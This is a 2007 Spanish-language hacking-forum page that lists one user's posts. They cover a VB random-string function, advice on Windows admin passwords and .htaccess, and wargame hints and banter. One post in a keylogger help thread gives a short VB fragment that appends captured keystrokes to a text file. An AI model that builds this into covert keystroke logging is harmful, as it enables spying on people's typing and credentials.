elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
18 Noviembre 2008, 16:55  



  Mostrar Mensajes
Páginas: 1 ... 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [19]
271  Programación / Programación VB / Re: ayuda con keylogger en: 16 Agosto 2007, 06:34
ya me las tome toasss xDD
272  Programación / Programación VB / Re: ayuda con keylogger en: 16 Agosto 2007, 06:16
TecN = Funcion para obtener las teclas

If TecN <> TecV Then
        TecV = TecN
        TecG = TecG & TecN
End If

open "c:\teclas.txt" for append as #1
print #1, TecG
close #1

TecG = ""
273  Programación / Programación VB / Re: Como generar una cadena de letras aleatorias... en: 16 Agosto 2007, 03:58
Código
'Para llamar a la funcion se hace por ejemplo
'Text1.text = Random(Text1.text)
Private Function Random(ByVal Texto As String) As String
Dim i&, menor&, mayor&, x&, r$      'Declaraciones
menor = 32                          'Caracter Ascii menor
mayor = 127                         'Caracter Ascii mayor
Randomize                           'Inicializar el generador de numeros aleatorios
For i = 1 To Len(Texto)             'Desde uno hasta la longitud del texto
x = Int((mayor - menor + 1) * Rnd + menor)      'Escoje un valor aleatorio tipo integer entre el Ascii menor y el Ascii mayor y lo asigna a x
If x > mayor Then x = mayor         'Si el valor de x es mayor al Ascii mayor entonces el valor de x es igual al Ascii mayor
r = r & Chr$(x)                     'El texto final es el texto final mas el caracter que simboliza el codigo Ascii en x
Next i                              'Termina el contador
Random = r                          'La funcion es igual al texto generado
End Function
 

Espero que les sea de ayuda :P
274  Seguridad Informática / Seguridad / Re: Seguridad en conexión escritorio remoto en: 09 Agosto 2007, 06:32
Cambia la contraseña del administrador de sistema, para que esta no sea nula, osea: user: Administrador[enter], pass:[enter].
Una falla grande es dejar al administrador sin contraseña, ya que cualquier persona que se conecte a tu equipo, y la cuenta de administrador este con la contraseña por defecto, puede acceder al escritorio remoto.

para cambiar la contraseña del administrador, inicia el windows en modo a prueba de fallos, en el login aparecera la sesion de administrador y tu sesion, entras a la de administrador, cambias la clave y listo.

saludos y que te sirva

no se si a eso te referias con lo de la seguridad..
275  Seguridad Informática / Seguridad / Re: Directorios "ocultos" en una página web en: 07 Agosto 2007, 01:53
si prueban, claro que pueden entrar, si eres administrador de algùn sistema, prueba a revisar los logs de la web a ver si alguna ip externa a tu lan pudo acceder a esas carpetas, ya si el nombre de la carpeta es muy rara, checa si el servidor tien alguna falla que permite mostrar los directorios.

para evitar este tipo de intrusiones se recomienda montar un .htaccess en la carpeta que se desea proteger, asi si la logran encontrar, primero deben entrar como un user registrado por el sistema.

saludos
276  Seguridad Informática / Desafíos - Wargames / Re: Tres señoras obesas(muy facil) en: 01 Agosto 2007, 21:59
bueno, jaja tenia toda la razon, la respuesta es la siguiente...
eran tres gordas, estaba lloviendo hacia un lado entonces:
     ) ' ' ' ' '
000)' ' ''' ' ->Lluvia
|    |->paraguas
|->Gordas sin mojarse
xD
277  Seguridad Informática / Desafíos - Wargames / Re: Tres señoras obesas(muy facil) en: 30 Julio 2007, 05:46
Que tan obesas eran la señoras?, y si son regordas, entonces el paraguas tenia extensiones jajajaja
ya te mando la respuesta, aunque es muy obvia :P
saludos
278  Seguridad Informática / WarZone / Re: Para los Guerreros de: WarZone ! en: 07 Julio 2007, 05:17
pero igual cuando alguien llegue a ese rango...
yo me conformo con mi userbar xD
279  Seguridad Informática / WarZone / Re: Para los Guerreros de: WarZone ! en: 07 Julio 2007, 00:05
No falto el de nightmare??
280  Seguridad Informática / WarZone / Re: Para los Guerreros de: WarZone ! en: 06 Julio 2007, 01:07
primero piensa en que esta hecho el codigo, y luego te fijas bien en el codigo fuente, de seguro asi lo conseguis

saludos!
281  Seguridad Informática / Criptografía / Re: Torneo de Criptografia elhacker.net en: 03 Julio 2007, 22:59
Me apunto :P, aunque no gane nada (de seguro :P) vale la pena concursar...
aca mis datos

Nombre del participante: hades
Sección: CriptoLiga
Lenguajes: visual basic 6  :¬¬

del warzone
282  Seguridad Informática / WarZone / Re: Para los Guerreros de: WarZone ! en: 02 Julio 2007, 04:22
Pues en el reto de la cocina, primero piensa que se puede hacer en una cocina que se puede relacionar con la informatica y luego aplica!
es parecido a un viejo bug de phpbb :P
espero no haber dicho mucho  :-X
283  Seguridad Informática / WarZone / Re: Para los Guerreros de: WarZone ! en: 01 Julio 2007, 07:57
Bueno ya que es el primer post que hago, hago mi presentacion, aunque no sea el lugar adecuado, mi nick es HaDeS (HaDeS. ¬¬), soy de colombia, tengo poca edad y ps me gusta todo lo que tenga que ver con hack.

Con respecto a warzone...
Excelente pruebas   ;D
aunke hash da dolor de cabeza  :¬¬
y el zeroday  :¬¬
y colisiones  :¬¬
y otros que no recuerdo  :¬¬
pero vale, estan buenos  ;D

Saludos!
Páginas: 1 ... 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [19]






Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.7 | SMF © 2006-2008, Simple Machines LLC